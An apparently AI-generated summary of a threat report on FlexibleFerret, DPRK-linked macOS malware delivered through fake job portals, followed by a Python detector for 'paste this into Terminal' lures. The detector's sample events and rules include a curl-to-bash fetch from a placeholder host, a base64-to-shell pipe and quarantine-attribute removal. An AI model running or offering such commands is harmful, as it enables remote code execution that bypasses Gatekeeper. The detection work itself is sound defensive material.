DPRK's FlexibleFerret Expands macOS Credential Theft Campaign


These articles are AI-generated summaries. Please check the original sources for full details.

DPRK’s FlexibleFerret Tightens macOS Grip

The DPRK-linked threat actor behind the “Contagious Interview” campaign has updated its FlexibleFerret malware to target macOS users through fake job portals. A 2025 Jamf Threat Labs report describes a Go-based backdoor that steals credentials and system data from infected machines.

Why This Matters

Gatekeeper, macOS’s built-in check on downloaded executables, is designed to block untrusted apps from launching. FlexibleFerret does not break that check; it routes around it. The victim is coerced into pasting and running a command in Terminal themselves, and a command a user types into a shell is not subject to Gatekeeper’s launch-time evaluation, so the protection never comes into play. Jamf Threat Labs notes that this campaign illustrates a wider trend of attackers using social engineering to circumvent technical safeguards, and that credentials stolen this way can lead to large-scale data breaches.

Key Insights

  • “Updated shell-loader with architecture-aware logic, 2025” (Jamf Threat Labs report)
  • “Social engineering via fake job portals to bypass Gatekeeper protections” (Contagious Interview campaign)
  • “MediaPatcher.app decoy used by DPRK-linked actors” (Jamf analysis)

Practical Applications

  • Use Case: Fake job portals mimicking legitimate hiring assessments to trick users into executing malware
  • Pitfall: Users running unverified Terminal commands from phishing sites, leading to credential theft and persistent backdoor access
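As an added example (not code from the page, from Jamf Threat Labs, or from the report), the following Python detection logic flags the “paste this into Terminal” pattern the pitfall above describes: command lines that pipe a downloaded or base64-decoded payload straight into a shell, or that strip the quarantine attribute Gatekeeper relies on. The event records, their field names, and the rule patterns are assumptions constructed for this example; the page does not specify the exact commands FlexibleFerret’s lure uses, and the quarantine-attribute rule is a generic Gatekeeper-evasion indicator rather than a reported FlexibleFerret behaviour.

```python
import re
from dataclasses import dataclass

# Constructed sample of shell-command events, e.g. as an EDR or shell-history
# collector might export them. This record shape is an assumption for the
# example, not Jamf's format and not taken from the report.
SAMPLE_EVENTS = [
    {"pid": 501, "parent": "Terminal", "user": "alice",
     "cmdline": "ls -la ~/Downloads"},
    {"pid": 502, "parent": "Terminal", "user": "alice",
     "cmdline": "curl -fsSL https://example.invalid/setup.sh | bash"},
    {"pid": 503, "parent": "Terminal", "user": "alice",
     "cmdline": "echo aGVsbG8= | base64 -d | sh"},
    {"pid": 504, "parent": "launchd", "user": "root",
     "cmdline": "/usr/libexec/xpcproxy"},
    {"pid": 505, "parent": "Terminal", "user": "alice",
     "cmdline": "git pull origin main"},
    {"pid": 506, "parent": "Terminal", "user": "bob",
     "cmdline": "xattr -d com.apple.quarantine /Applications/MediaPatcher.app"},
]

# Only command lines entered through an interactive shell are in scope: the
# social-engineering path runs through the user's own Terminal session.
INTERACTIVE_SHELL_PARENTS = {"Terminal", "iTerm2", "bash", "zsh", "sh"}

# Generic indicators for "run this in Terminal" lures. Each rule is a
# (name, regex) pair; the first match wins. Patterns are assumptions, not
# the report's IOCs.
RULES = [
    # A remote script fetched with curl/wget and piped directly into a shell:
    # nothing touches disk with a quarantine attribute, so Gatekeeper never runs.
    ("remote-script-piped-to-shell",
     re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba|z)?sh\b")),
    # An inline base64 blob decoded and piped into a shell, a common way to
    # hide the real command from the person pasting it.
    ("decoded-payload-piped-to-shell",
     re.compile(r"base64\s+(-d|--decode)[^|]*\|\s*(ba|z)?sh\b")),
    # Explicit removal of the quarantine attribute from a downloaded item,
    # which disables Gatekeeper's check for that item.
    ("quarantine-attribute-removed",
     re.compile(r"\bxattr\b.*-d\s+com\.apple\.quarantine")),
]


@dataclass(frozen=True)
class Finding:
    pid: int
    user: str
    rule: str
    cmdline: str


def evaluate(events):
    """Return one Finding per in-scope event whose command line trips a rule."""
    findings = []
    for ev in events:
        if ev["parent"] not in INTERACTIVE_SHELL_PARENTS:
            continue
        for name, pattern in RULES:
            if pattern.search(ev["cmdline"]):
                findings.append(Finding(ev["pid"], ev["user"], name, ev["cmdline"]))
                break  # report the first matching rule only
    return findings


if __name__ == "__main__":
    for f in evaluate(SAMPLE_EVENTS):
        print(f"pid={f.pid} user={f.user} rule={f.rule}: {f.cmdline}")
```

A plain download (`curl -O ...`) without a pipe into a shell is deliberately not flagged: the file lands on disk with a quarantine attribute and Gatekeeper gets its chance when the user opens it. The rules fire only on the paths that skip that check entirely.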
